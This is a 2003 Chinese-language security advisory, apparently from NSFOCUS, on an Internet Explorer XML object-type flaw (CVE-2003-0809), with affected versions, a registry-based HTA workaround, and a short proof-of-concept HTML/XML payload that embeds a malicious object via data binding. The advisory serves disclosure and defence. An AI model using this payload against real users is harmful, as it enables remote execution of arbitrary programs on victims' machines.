安全研究

安全漏洞
Microsoft Internet Explorer XML页对象类型确认漏洞

发布日期:2003-09-07
更新日期:2003-09-11

受影响系统:
Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 6.0
    - Microsoft Windows XP
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 2003 Web Edition
    - Microsoft Windows 2003 Standard Edition
    - Microsoft Windows 2003 Enterprise Edition 64-bit
    - Microsoft Windows 2003 Enterprise Edition
    - Microsoft Windows 2003 Datacenter Edition 64-bit
    - Microsoft Windows 2003 Datacenter Edition
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
    - Microsoft Windows 2000 Server
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
    - Microsoft Windows 2000 Datacenter Server SP2
    - Microsoft Windows 2000 Datacenter Server SP1
    - Microsoft Windows 2000 Datacenter Server
    - Microsoft Windows 2000 Advanced Server SP2
    - Microsoft Windows 2000 Advanced Server SP1
    - Microsoft Windows 2000 Advanced Server
描述:
BUGTRAQ  ID: 8565
CVE(CAN) ID: CVE-2003-0809

Microsoft Internet Explorer是一款流行的WEB浏览程序。

Microsoft Internet Explorer当处理基于XML的WEB站点时没有正确处理对象类型,远程攻击者可以利用这个漏洞把恶意对象安装并在系统上执行。

由于没有正确处理嵌入在XML页面中的对象类型,攻击者构建包含恶意对象的XML页面,诱使用户访问, 可导致目标用户会把这个对象以可信对象装载处理,因此精心构建对象数据可以在目标用户上安装和执行任意程序。

<*来源:http-equiv (http-equiv@malware.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106304876523459&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http-equiv (http-equiv@malware.com)提供了如下测试方法:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" data="badnews.php"></object>
]]>
</exploit>
</security>
</xml>

演示页面如下:

http://www.malware.com/greymagic.html

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 通过更改'application/hta'键值来关闭HTA应用程序的执行:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type

更改application/hta为任意值。

厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

浏览次数:3765
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障